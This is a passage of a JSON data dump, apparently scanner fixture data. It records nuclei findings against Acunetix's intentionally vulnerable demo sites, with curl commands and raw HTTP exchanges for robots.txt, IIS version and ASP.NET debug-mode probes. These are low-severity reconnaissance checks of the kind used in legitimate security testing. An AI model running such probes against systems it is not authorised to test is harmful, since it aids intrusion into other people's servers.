10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0 OS/10.0.22000\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 13\r\nAccept-Ranges: bytes\r\nContent-Type: text/plain\r\nDate: Wed, 13 Nov 2024 02:43:30 GMT\r\nEtag: "b0b05ac194d51:0"\r\nLast-Modified: Mon, 06 May 2019 12:46:42 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\nUser-agent: *", + "is_llm_used": false, + "tags": [ + 18, + 17, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1023, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/miscellaneous/robots-txt-endpoint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/robots-txt-endpoint", + "template_id": "robots-txt-endpoint", + "matcher_name": "", + "name": "robots.txt endpoint prober", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0' 'http://testasp.vulnweb.com/robots.txt'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/robots.txt", + "discovered_date": "2024-11-13T02:43:35.785Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /robots.txt HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 13\r\nAccept-Ranges: bytes\r\nContent-Type: text/plain\r\nDate: Wed, 13 Nov 2024 02:43:30 GMT\r\nEtag: "3629faa394d51:0"\r\nLast-Modified: Mon, 06 May 2019 12:45:52 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\nUser-agent: *", + "is_llm_used": false, + "tags": [ + 18, + 17, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1024, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/aspx-debug-mode.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/aspx-debug-mode", + "template_id": "aspx-debug-mode", + "matcher_name": "", + "name": "ASP.NET Debugging Enabled", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'DEBUG' -d '' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Command: stop-debug' -H 'Content-Length: 2' -H 'Host: testaspnet.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.81' 'http://testaspnet.vulnweb.com/Foobar-debug.aspx'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com/Foobar-debug.aspx", + "discovered_date": "2024-11-13T02:43:44.600Z", + "open_status": true, + "hackerone_report_id": null, + "request": "DEBUG /Foobar-debug.aspx HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.81\r\nConnection: close\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nCommand: stop-debug\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 2\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:43:40 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Aspnet-Version: 2.0.50727\r\nX-Powered-By: ASP.NET\r\n\r\nOK", + "is_llm_used": false, + "tags": [ + 15, + 6 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1025, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/microsoft/microsoft-iis-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/microsoft-iis-version", + "template_id": "microsoft-iis-version", + "matcher_name": "", + "name": "Microsoft IIS version detect", + "severity": 0, + "description": "Some Microsoft IIS servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"Microsoft-IIS/8.5\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.175 Safari/537.36' 'http://testasp.vulnweb.com/%E2%80%93'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/%E2%80%93", + "discovered_date": "2024-11-13T02:44:10.545Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /%E2%80%93 HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.175 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nContent-Length: 1245\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:44:06 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>404 - File or directory not found.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>404 - File or directory not found.</h2>\r\n <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 5, + 33, + 34 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1026, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/microsoft/microsoft-iis-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/microsoft-iis-version", + "template_id": "microsoft-iis-version", + "matcher_name": "", + "name": "Microsoft IIS version detect", + "severity": 0, + "description": "Some Microsoft IIS servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"Microsoft-IIS/8.5\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 maglev/24074.2321.2810.3500/49' 'http://testasp.vulnweb.com'", + "type": "http", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:44:10.857Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 maglev/24074.2321.2810.3500/49\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3541\r\nCache-Control: private\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:44:06 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASPSESSIONIDSASBSTRC=LLBCLMIBIMDBJCBNKNAGNGDG; path=/\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\r\n<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->\r\n<head>\r\n<!-- InstanceBeginEditable name="doctitle" -->\r\n<title>acuforum forums</title>\r\n<!-- InstanceEndEditable -->\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">\r\n<!-- InstanceBeginEditable name="head" -->\r\n<!-- InstanceEndEditable -->\r\n<link href="styles.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body> \r\n<table width="100%" border="0" cellpadding="10" cellspacing="0"> \r\n <tr bgcolor="#008F00"> \r\n <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> \r\n <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> \r\n - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> \r\n\t- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>\r\n </div></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->\r\n\t<table width="100%" border="0" cellspacing="0" cellpadding="5">\r\n <tr>\r\n <td class="tableheader">Forum</td>\r\n <td class="tableheader">Threads</td>\r\n <td class="tableheader">Posts</td>\r\n <td class="tableheader">Last Post</td>\r\n </tr> \r\n\t<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>11/13/2024 2:31:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>\r\n\t</table><!-- InstanceEndEditable --></td> \r\n </tr> \r\n <tr align="right" bgcolor="#FFFFFF"> \r\n <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> \r\n </tr> \r\n</table> \r\n<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">\r\n\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>\r\n</div>\r\n</body>\r\n<!-- InstanceEnd --></html>\r\n", + "is_llm_used": false, + "tags": [ + 5, + 33, + 34 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1027, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/microsoft/microsoft-iis-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/microsoft-iis-version", + "template_id": "microsoft-iis-version", + "matcher_name": "", + "name": "Microsoft IIS version detect", + "severity": 0, + "description": "Some Microsoft IIS servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"Microsoft-IIS/8.5\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:124.0) Gecko/20100101 Firefox/124.0' 'http://testaspnet.vulnweb.com'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:44:11.156Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:124.0) Gecko/20100101 Firefox/124.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 14069\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:44:06 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASP.NET_SessionId=2wjwv0mlhlgham55jxmfab55; path=/; HttpOnly\r\nX-Aspnet-Version: 2.0.50727\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >\r\n<HTML>\r\n\t<HEAD>\r\n\t\t<title>acublog news</title>\r\n\t\t<META http-equiv="Content-Type" content="text/html; charset=windows-1252">\r\n\t\t<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">\r\n\t\t<meta content="C#" name="CODE_LANGUAGE">\r\n\t\t<meta content="JavaScript" name="vs_defaultClientScript">\r\n\t\t<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">\r\n\t\t<LINK href="styles.css" type="text/css" rel="stylesheet">\r\n\t</HEAD>\r\n\t<body>\r\n\t\t<form name="Form1" method="post" action="default.aspx" id="Form1">\r\n<div>\r\n<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />\r\n<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />\r\n<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />\r\n</div>\r\n\r\n<script type="text/javascript">\r\n//<![CDATA[\r\nvar theForm = document.forms['Form1'];\r\nif (!theForm) {\r\n theForm = document.Form1;\r\n}\r\nfunction __doPostBack(eventTarget, eventArgument) {\r\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\r\n theForm.__EVENTTARGET.value = eventTarget;\r\n theForm.__EVENTARGUMENT.value = eventArgument;\r\n theForm.submit();\r\n }\r\n}\r\n//]]>\r\n</script>\r\n\r\n\r\n<div>\r\n\r\n\t<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />\r\n\t<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig" />\r\n</div>\r\n\t\t\t\r\n<TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>\r\n\t\t<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"\r\n\t\t\theight="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>\r\n\t</TR>\r\n</TABLE>\r\n<TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>\r\n\t\t\t<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">\r\n\t\t\t\tsignup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>\r\n\t\t\t\t<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>\r\n\t\t</TD>\r\n\t\t<td class="MenuBar" align="right" width="50px">\r\n\t\t\t<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>\r\n\t\t</td>\r\n\t</TR>\r\n</TABLE>\r\n\r\n\t\t\t<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD id="tdPageData" valign="top">\r\n\t\t\t\t\t<DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">(66) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">(68) comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">(97) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>\r\n\r\n\t\t\t\t\t<TD vAlign="top" width="200">\r\n\t\t\t\t\t\t<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">\r\n\t<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">\r\n\t\t<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9040')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">November 2024</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9101')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>\r\n\t</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9066')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9067')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9068')" style="color:Black" title="October 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9069')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9070')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9071')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9072')" style="color:Black" title="November 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9073')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9074')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9075')" style="color:Black" title="November 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9076')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9077')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9078')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9079')" style="color:Black" title="November 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9080')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9081')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9082')" style="color:Black" title="November 12">12</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9083')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9084')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9085')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9086')" style="color:Black" title="November 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9087')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9088')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9089')" style="color:Black" title="November 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9090')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9091')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9092')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9093')" style="color:Black" title="November 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9094')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9095')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9096')" style="color:Black" title="November 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9097')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9098')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9099')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9100')" style="color:Black" title="November 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9101')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9102')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9103')" style="color:Black" title="December 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9104')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9105')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9106')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9107')" style="color:Black" title="December 07">7</a></td></tr>\r\n</table><BR>\r\n<a href="rssFeed.aspx">Get RSS feed</a>\r\n</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD colSpan="2">\r\n\t\t\t\t\t</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t</TABLE>\r\n\t\t</form>\r\n\t</body>\r\n\t<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">\r\n\t\t<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>\r\n\t</div>\r\n</HTML>\r\n", + "is_llm_used": false, + "tags": [ + 5, + 33, + 34 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1028, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/microsoft/microsoft-iis-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/microsoft-iis-version", + "template_id": "microsoft-iis-version", + "matcher_name": "", + "name": "Microsoft 